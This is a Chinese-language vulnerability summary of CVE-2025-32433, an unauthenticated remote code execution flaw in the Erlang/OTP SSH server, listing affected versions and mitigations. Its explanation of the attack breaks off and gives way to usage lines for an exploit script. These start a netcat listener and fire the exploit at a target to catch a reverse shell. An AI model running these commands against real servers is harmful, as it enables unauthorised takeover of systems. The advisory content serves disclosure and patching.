CVE-2025-32433 摘要与攻击概述
CVE-2025-32433 是 Erlang/OTP SSH 服务器中的一个严重的未认证远程代码执行(RCE)漏洞,于 2025 年 4 月 16 日披露。Erlang/OTP SSH 是一个用于各种分布式和电信应用程序的库。该缺陷源于对 SSH 协议消息的处理不当:服务器未能强制执行正常的认证序列,从而允许攻击者在认证之前发送特制的 SSH 消息。如此一来,攻击者便可在服务器上注入并执行任意 Erlang 代码 nvd.nist.gov offsec.com . 实际上,这意味着,能够访问易受攻击的 Erlang/OTP SSH 服务器(通常以 root 身份运行)的攻击者,无需任何凭据即可触发反向 shell 或执行命令,从而导致系统完全失陷 nvd.nist.gov offsec.com . 该漏洞的 CVSS 评分为 10.0(最高严重性) offsec.com .
受影响版本为 OTP-27.3.3、OTP-26.2.5.11 或 OTP-25.3.2.20 以下的所有 Erlang/OTP 版本(这些是已修复版本) nvd.nist.gov offsec.com . 受影响系统通常包括运行基于 Erlang 的 SSH 守护进程(不要与 OpenSSH 混淆)的 Linux 服务器或设备。重要的是,Linux/BSD 上的默认 OpenSSH 服务器不受影响 offsec.com . 用户应假设任何暴露的 Erlang/OTP SSH 服务器都受到影响,并立即应用官方补丁或禁用 SSH 服务。
该攻击的工作原理是:先发起一个 SSH 连接,然后按乱序发送一系列 SSH 消息。 :
用法:
sudo chmod +x exploit.py
nc -nvlp
python3 exploit.py -t -p 22 --lhost --lport
示例:
nc -nvlp 5555
python3 exploit.py -t 10.10.22.111 -p 22 --lhost 10.12.33.111 --lport 55555